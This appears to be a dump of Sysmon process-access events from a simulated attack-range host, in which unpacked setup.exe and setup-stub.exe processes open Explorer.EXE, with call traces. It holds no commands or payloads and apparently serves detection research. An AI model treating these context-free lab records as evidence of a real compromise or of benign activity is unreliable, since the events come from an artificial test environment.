13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000015226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000015223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000015221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
